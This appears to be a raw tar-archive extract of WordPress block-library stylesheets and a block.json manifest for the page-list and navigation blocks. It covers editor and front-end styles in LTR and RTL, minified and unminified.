.wp-block-navigation .wp-block-navigation-item{
  background-color:inherit;
}page-list/style-rtl.min.css000060400000000552151330427370011667 0ustar00.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}page-list/editor.min.css000060400000002217151330427370011216 0ustar00.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{background-color:inherit}.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{display:contents;flex:1}.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{flex:inherit}.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{display:block}.wp-block-pages-list__item__link{pointer-events:none}@media (min-width:600px){.wp-block-page-list-modal{max-width:480px}}.wp-block-page-list-modal-buttons{display:flex;gap:12px;justify-content:flex-end}.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;visibility:visible;width:auto}.wp-block-page-list__loading-indicator-container{padding:8px 12px}page-list/style.css000060400000000610151330427370010301 0ustar00.wp-block-navigation .wp-block-page-list{
  align-items:var(--navigation-layout-align, initial);
  background-color:inherit;
  display:flex;
  flex-direction:var(--navigation-layout-direction, initial);
  flex-wrap:var(--navigation-layout-wrap, wrap);
  justify-content:var(--navigation-layout-justify, initial);
}
.wp-block-navigation .wp-block-navigation-item{
  background-color:inherit;
}page-list/editor.css000060400000002347151330427370010440 0ustar00.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{
  background-color:inherit;
}
.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{
  display:contents;
  flex:1;
}
.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{
  flex:inherit;
}

.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{
  display:block;
}

.wp-block-pages-list__item__link{
  pointer-events:none;
}

@media (min-width:600px){
  .wp-block-page-list-modal{
    max-width:480px;
  }
}

.wp-block-page-list-modal-buttons{
  display:flex;
  gap:12px;
  justify-content:flex-end;
}

.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{
  height:auto;
  min-width:200px;
  opacity:1;
  visibility:visible;
  width:auto;
}

.wp-block-page-list__loading-indicator-container{
  padding:8px 12px;
}page-list/style.min.css000060400000000552151330427370011070 0ustar00.wp-block-navigation .wp-block-page-list{align-items:var(--navigation-layout-align,initial);background-color:inherit;display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation .wp-block-navigation-item{background-color:inherit}page-list/editor-rtl.css000060400000002347151330427370011237 0ustar00.wp-block-navigation .wp-block-page-list,.wp-block-navigation .wp-block-page-list>div{
  background-color:inherit;
}
.wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{
  display:contents;
  flex:1;
}
.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{
  flex:inherit;
}

.wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{
  display:block;
}

.wp-block-pages-list__item__link{
  pointer-events:none;
}

@media (min-width:600px){
  .wp-block-page-list-modal{
    max-width:480px;
  }
}

.wp-block-page-list-modal-buttons{
  display:flex;
  gap:12px;
  justify-content:flex-end;
}

.wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{
  height:auto;
  min-width:200px;
  opacity:1;
  visibility:visible;
  width:auto;
}

.wp-block-page-list__loading-indicator-container{
  padding:8px 12px;
}page-list/block.json000060400000002437151330427370010425 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/page-list",
	"title": "Page List",
	"category": "widgets",
	"allowedBlocks": [ "core/page-list-item" ],
	"description": "Display a list of all pages.",
	"keywords": [ "menu", "navigation" ],
	"textdomain": "default",
	"attributes": {
		"parentPageID": {
			"type": "integer",
			"default": 0
		},
		"isNested": {
			"type": "boolean",
			"default": false
		}
	},
	"usesContext": [
		"textColor",
		"customTextColor",
		"backgroundColor",
		"customBackgroundColor",
		"overlayTextColor",
		"customOverlayTextColor",
		"overlayBackgroundColor",
		"customOverlayBackgroundColor",
		"fontSize",
		"customFontSize",
		"showSubmenuIcon",
		"style",
		"openSubmenusOnClick"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-page-list-editor",
	"style": "wp-block-page-list"
}
navigation/editor-rtl.css000060400000030772151330427370011514 0ustar00.editor-styles-wrapper .wp-block-navigation ul{
  margin-bottom:0;
  margin-right:0;
  margin-top:0;
  padding-right:0;
}
.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{
  margin:revert;
}

.wp-block-navigation-item__label{
  display:inline;
}
.wp-block-navigation-item,.wp-block-navigation__container{
  background-color:inherit;
}

.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{
  opacity:0;
  visibility:hidden;
}

.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{
  display:flex;
  opacity:1;
  visibility:visible;
}

.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{
  opacity:1;
  visibility:visible;
}

.is-editing>.wp-block-navigation__container{
  display:flex;
  flex-direction:column;
  opacity:1;
  visibility:visible;
}

.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{
  opacity:1;
  visibility:hidden;
}
.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{
  visibility:visible;
}

.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{
  display:block;
  position:static;
  width:100%;
}
.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{
  background:#1e1e1e;
  border-radius:2px;
  color:#fff;
  margin-left:0;
  margin-right:auto;
  padding:0;
  width:24px;
}

.wp-block-navigation__submenu-container .block-list-appender{
  display:none;
}
.block-library-colors-selector{
  width:auto;
}
.block-library-colors-selector .block-library-colors-selector__toggle{
  display:block;
  margin:0 auto;
  padding:3px;
  width:auto;
}
.block-library-colors-selector .block-library-colors-selector__icon-container{
  align-items:center;
  border-radius:4px;
  display:flex;
  height:30px;
  margin:0 auto;
  padding:3px;
  position:relative;
}
.block-library-colors-selector .block-library-colors-selector__state-selection{
  border-radius:11px;
  box-shadow:inset 0 0 0 1px #0003;
  height:22px;
  line-height:20px;
  margin-left:auto;
  margin-right:auto;
  min-height:22px;
  min-width:22px;
  padding:2px;
  width:22px;
}
.block-library-colors-selector .block-library-colors-selector__state-selection>svg{
  min-width:auto !important;
}
.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{
  color:inherit;
}

.block-library-colors-selector__popover .color-palette-controller-container{
  padding:16px;
}
.block-library-colors-selector__popover .components-base-control__label{
  height:20px;
  line-height:20px;
}
.block-library-colors-selector__popover .component-color-indicator{
  float:left;
  margin-top:2px;
}
.block-library-colors-selector__popover .components-panel__body-title{
  display:none;
}

.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{
  background-color:#1e1e1e;
  color:#fff;
}
.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{
  padding:0;
}

.wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{
  background-color:initial;
  color:#1e1e1e;
}
@keyframes loadingpulse{
  0%{
    opacity:1;
  }
  50%{
    opacity:.5;
  }
  to{
    opacity:1;
  }
}
.components-placeholder.wp-block-navigation-placeholder{
  background:none;
  box-shadow:none;
  color:inherit;
  min-height:0;
  outline:none;
  padding:0;
}
.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{
  font-size:inherit;
}
.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{
  margin-bottom:0;
}
.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{
  color:#1e1e1e;
}

.wp-block-navigation-placeholder__preview{
  align-items:center;
  background:#0000;
  color:currentColor;
  display:flex;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  min-width:96px;
}
.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{
  display:none;
}
.wp-block-navigation-placeholder__preview:before{
  border:1px dashed;
  border-radius:2px;
  border-radius:inherit;
  bottom:0;
  content:"";
  display:block;
  left:0;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-navigation-placeholder__preview:before:before{
  background:currentColor;
  bottom:0;
  content:"";
  left:0;
  opacity:.1;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-navigation-placeholder__preview>svg{
  fill:currentColor;
}

.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{
  min-height:90px;
}

.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{
  min-height:132px;
}

.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{
  align-items:flex-start;
  flex-direction:row;
  padding:6px 8px;
}

.wp-block-navigation-placeholder__controls{
  background-color:#fff;
  border-radius:2px;
  box-shadow:inset 0 0 0 1px #1e1e1e;
  display:none;
  float:right;
  position:relative;
  width:100%;
  z-index:1;
}
.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{
  display:flex;
}
.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{
  display:none;
}
.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{
  align-items:flex-start;
  flex-direction:column;
}
.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{
  display:none;
}
.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{
  height:36px;
  margin-left:12px;
}

.wp-block-navigation-placeholder__actions__indicator{
  align-items:center;
  display:flex;
  height:36px;
  justify-content:flex-start;
  line-height:0;
  margin-right:4px;
  padding:0 0 0 6px;
}
.wp-block-navigation-placeholder__actions__indicator svg{
  margin-left:4px;
  fill:currentColor;
}

.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{
  flex-direction:row !important;
}

.wp-block-navigation-placeholder__actions{
  align-items:center;
  display:flex;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  gap:6px;
  height:100%;
}
.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{
  margin-left:0;
}
.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{
  background-color:#1e1e1e;
  border:0;
  height:100%;
  margin:auto 0;
  max-height:16px;
  min-height:1px;
  min-width:1px;
}
@media (min-width:600px){
  .wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{
    display:none;
  }
}

.wp-block-navigation__responsive-container.is-menu-open{
  position:fixed;
  top:155px;
}
@media (min-width:782px){
  .wp-block-navigation__responsive-container.is-menu-open{
    right:36px;
    top:93px;
  }
}
@media (min-width:960px){
  .wp-block-navigation__responsive-container.is-menu-open{
    right:160px;
  }
}

@media (min-width:782px){
  .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{
    top:141px;
  }
}

.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{
  top:141px;
}

.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{
  right:0;
  top:155px;
}
@media (min-width:782px){
  .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{
    top:61px;
  }
  .is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{
    top:109px;
  }
}
.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{
  top:109px;
}

body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{
  bottom:0;
  left:0;
  right:0;
  top:0;
}

.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{
  color:inherit;
  height:auto;
  padding:0;
}

.components-heading.wp-block-navigation-off-canvas-editor__title{
  margin:0;
}

.wp-block-navigation-off-canvas-editor__header{
  margin-bottom:8px;
}

.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{
  margin-top:16px;
}

@keyframes fadein{
  0%{
    opacity:0;
  }
  to{
    opacity:1;
  }
}
.wp-block-navigation__loading-indicator-container{
  padding:8px 12px;
}

.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{
  margin-top:0;
}

@keyframes fadeouthalf{
  0%{
    opacity:1;
  }
  to{
    opacity:.5;
  }
}
.wp-block-navigation-delete-menu-button{
  justify-content:center;
  margin-bottom:16px;
  width:100%;
}

.components-button.is-link.wp-block-navigation-manage-menus-button{
  margin-bottom:16px;
}

.wp-block-navigation__overlay-menu-preview{
  align-items:center;
  background-color:#f0f0f0;
  display:flex;
  height:64px;
  justify-content:space-between;
  margin-bottom:12px;
  padding:0 24px;
  width:100%;
}
.wp-block-navigation__overlay-menu-preview.open{
  background-color:#fff;
  box-shadow:inset 0 0 0 1px #e0e0e0;
  outline:1px solid #0000;
}

.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{
  display:none;
}
.wp-block-navigation__navigation-selector{
  margin-bottom:16px;
  width:100%;
}

.wp-block-navigation__navigation-selector-button{
  border:1px solid;
  justify-content:space-between;
  width:100%;
}

.wp-block-navigation__navigation-selector-button__icon{
  flex:0 0 auto;
}

.wp-block-navigation__navigation-selector-button__label{
  flex:0 1 auto;
  overflow:hidden;
  text-overflow:ellipsis;
  white-space:nowrap;
}

.wp-block-navigation__navigation-selector-button--createnew{
  border:1px solid;
  margin-bottom:16px;
  width:100%;
}

.wp-block-navigation__responsive-container-open.components-button{
  opacity:1;
}

.wp-block-navigation__menu-inspector-controls{
  overflow-x:auto;
  scrollbar-color:#0000 #0000;
  scrollbar-gutter:stable both-edges;
  scrollbar-width:thin;
  will-change:transform;
}
.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{
  height:12px;
  width:12px;
}
.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{
  background-color:initial;
}
.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{
  background-clip:padding-box;
  background-color:initial;
  border:3px solid #0000;
  border-radius:8px;
}
.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{
  background-color:#949494;
}
.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{
  scrollbar-color:#949494 #0000;
}
@media (hover:none){
  .wp-block-navigation__menu-inspector-controls{
    scrollbar-color:#949494 #0000;
  }
}

.wp-block-navigation__menu-inspector-controls__empty-message{
  margin-right:24px;
}navigation/editor.css000060400000030766151330427370010720 0ustar00.editor-styles-wrapper .wp-block-navigation ul{
  margin-bottom:0;
  margin-left:0;
  margin-top:0;
  padding-left:0;
}
.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{
  margin:revert;
}

.wp-block-navigation-item__label{
  display:inline;
}
.wp-block-navigation-item,.wp-block-navigation__container{
  background-color:inherit;
}

.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{
  opacity:0;
  visibility:hidden;
}

.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{
  display:flex;
  opacity:1;
  visibility:visible;
}

.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{
  opacity:1;
  visibility:visible;
}

.is-editing>.wp-block-navigation__container{
  display:flex;
  flex-direction:column;
  opacity:1;
  visibility:visible;
}

.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{
  opacity:1;
  visibility:hidden;
}
.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{
  visibility:visible;
}

.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{
  display:block;
  position:static;
  width:100%;
}
.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{
  background:#1e1e1e;
  border-radius:2px;
  color:#fff;
  margin-left:auto;
  margin-right:0;
  padding:0;
  width:24px;
}

.wp-block-navigation__submenu-container .block-list-appender{
  display:none;
}
.block-library-colors-selector{
  width:auto;
}
.block-library-colors-selector .block-library-colors-selector__toggle{
  display:block;
  margin:0 auto;
  padding:3px;
  width:auto;
}
.block-library-colors-selector .block-library-colors-selector__icon-container{
  align-items:center;
  border-radius:4px;
  display:flex;
  height:30px;
  margin:0 auto;
  padding:3px;
  position:relative;
}
.block-library-colors-selector .block-library-colors-selector__state-selection{
  border-radius:11px;
  box-shadow:inset 0 0 0 1px #0003;
  height:22px;
  line-height:20px;
  margin-left:auto;
  margin-right:auto;
  min-height:22px;
  min-width:22px;
  padding:2px;
  width:22px;
}
.block-library-colors-selector .block-library-colors-selector__state-selection>svg{
  min-width:auto !important;
}
.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{
  color:inherit;
}

.block-library-colors-selector__popover .color-palette-controller-container{
  padding:16px;
}
.block-library-colors-selector__popover .components-base-control__label{
  height:20px;
  line-height:20px;
}
.block-library-colors-selector__popover .component-color-indicator{
  float:right;
  margin-top:2px;
}
.block-library-colors-selector__popover .components-panel__body-title{
  display:none;
}

.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{
  background-color:#1e1e1e;
  color:#fff;
}
.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{
  padding:0;
}

.wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{
  background-color:initial;
  color:#1e1e1e;
}
@keyframes loadingpulse{
  0%{
    opacity:1;
  }
  50%{
    opacity:.5;
  }
  to{
    opacity:1;
  }
}
.components-placeholder.wp-block-navigation-placeholder{
  background:none;
  box-shadow:none;
  color:inherit;
  min-height:0;
  outline:none;
  padding:0;
}
.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{
  font-size:inherit;
}
.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{
  margin-bottom:0;
}
.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{
  color:#1e1e1e;
}

.wp-block-navigation-placeholder__preview{
  align-items:center;
  background:#0000;
  color:currentColor;
  display:flex;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  min-width:96px;
}
.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{
  display:none;
}
.wp-block-navigation-placeholder__preview:before{
  border:1px dashed;
  border-radius:2px;
  border-radius:inherit;
  bottom:0;
  content:"";
  display:block;
  left:0;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-navigation-placeholder__preview:before:before{
  background:currentColor;
  bottom:0;
  content:"";
  left:0;
  opacity:.1;
  pointer-events:none;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-navigation-placeholder__preview>svg{
  fill:currentColor;
}

.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{
  min-height:90px;
}

.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{
  min-height:132px;
}

.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{
  align-items:flex-start;
  flex-direction:row;
  padding:6px 8px;
}

.wp-block-navigation-placeholder__controls{
  background-color:#fff;
  border-radius:2px;
  box-shadow:inset 0 0 0 1px #1e1e1e;
  display:none;
  float:left;
  position:relative;
  width:100%;
  z-index:1;
}
.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{
  display:flex;
}
.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{
  display:none;
}
.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{
  align-items:flex-start;
  flex-direction:column;
}
.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{
  display:none;
}
.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{
  height:36px;
  margin-right:12px;
}

.wp-block-navigation-placeholder__actions__indicator{
  align-items:center;
  display:flex;
  height:36px;
  justify-content:flex-start;
  line-height:0;
  margin-left:4px;
  padding:0 6px 0 0;
}
.wp-block-navigation-placeholder__actions__indicator svg{
  margin-right:4px;
  fill:currentColor;
}

.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{
  flex-direction:row !important;
}

.wp-block-navigation-placeholder__actions{
  align-items:center;
  display:flex;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  gap:6px;
  height:100%;
}
.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{
  margin-right:0;
}
.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{
  background-color:#1e1e1e;
  border:0;
  height:100%;
  margin:auto 0;
  max-height:16px;
  min-height:1px;
  min-width:1px;
}
@media (min-width:600px){
  .wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{
    display:none;
  }
}

.wp-block-navigation__responsive-container.is-menu-open{
  position:fixed;
  top:155px;
}
@media (min-width:782px){
  .wp-block-navigation__responsive-container.is-menu-open{
    left:36px;
    top:93px;
  }
}
@media (min-width:960px){
  .wp-block-navigation__responsive-container.is-menu-open{
    left:160px;
  }
}

@media (min-width:782px){
  .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{
    top:141px;
  }
}

.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{
  top:141px;
}

.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{
  left:0;
  top:155px;
}
@media (min-width:782px){
  .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{
    top:61px;
  }
  .is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{
    top:109px;
  }
}
.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{
  top:109px;
}

body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{
  bottom:0;
  left:0;
  right:0;
  top:0;
}

.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{
  color:inherit;
  height:auto;
  padding:0;
}

.components-heading.wp-block-navigation-off-canvas-editor__title{
  margin:0;
}

.wp-block-navigation-off-canvas-editor__header{
  margin-bottom:8px;
}

.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{
  margin-top:16px;
}

@keyframes fadein{
  0%{
    opacity:0;
  }
  to{
    opacity:1;
  }
}
.wp-block-navigation__loading-indicator-container{
  padding:8px 12px;
}

.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{
  margin-top:0;
}

@keyframes fadeouthalf{
  0%{
    opacity:1;
  }
  to{
    opacity:.5;
  }
}
.wp-block-navigation-delete-menu-button{
  justify-content:center;
  margin-bottom:16px;
  width:100%;
}

.components-button.is-link.wp-block-navigation-manage-menus-button{
  margin-bottom:16px;
}

.wp-block-navigation__overlay-menu-preview{
  align-items:center;
  background-color:#f0f0f0;
  display:flex;
  height:64px;
  justify-content:space-between;
  margin-bottom:12px;
  padding:0 24px;
  width:100%;
}
.wp-block-navigation__overlay-menu-preview.open{
  background-color:#fff;
  box-shadow:inset 0 0 0 1px #e0e0e0;
  outline:1px solid #0000;
}

.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{
  display:none;
}
.wp-block-navigation__navigation-selector{
  margin-bottom:16px;
  width:100%;
}

.wp-block-navigation__navigation-selector-button{
  border:1px solid;
  justify-content:space-between;
  width:100%;
}

.wp-block-navigation__navigation-selector-button__icon{
  flex:0 0 auto;
}

.wp-block-navigation__navigation-selector-button__label{
  flex:0 1 auto;
  overflow:hidden;
  text-overflow:ellipsis;
  white-space:nowrap;
}

.wp-block-navigation__navigation-selector-button--createnew{
  border:1px solid;
  margin-bottom:16px;
  width:100%;
}

.wp-block-navigation__responsive-container-open.components-button{
  opacity:1;
}

.wp-block-navigation__menu-inspector-controls{
  overflow-x:auto;
  scrollbar-color:#0000 #0000;
  scrollbar-gutter:stable both-edges;
  scrollbar-width:thin;
  will-change:transform;
}
.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{
  height:12px;
  width:12px;
}
.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{
  background-color:initial;
}
.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{
  background-clip:padding-box;
  background-color:initial;
  border:3px solid #0000;
  border-radius:8px;
}
.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{
  background-color:#949494;
}
.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{
  scrollbar-color:#949494 #0000;
}
@media (hover:none){
  .wp-block-navigation__menu-inspector-controls{
    scrollbar-color:#949494 #0000;
  }
}

.wp-block-navigation__menu-inspector-controls__empty-message{
  margin-left:24px;
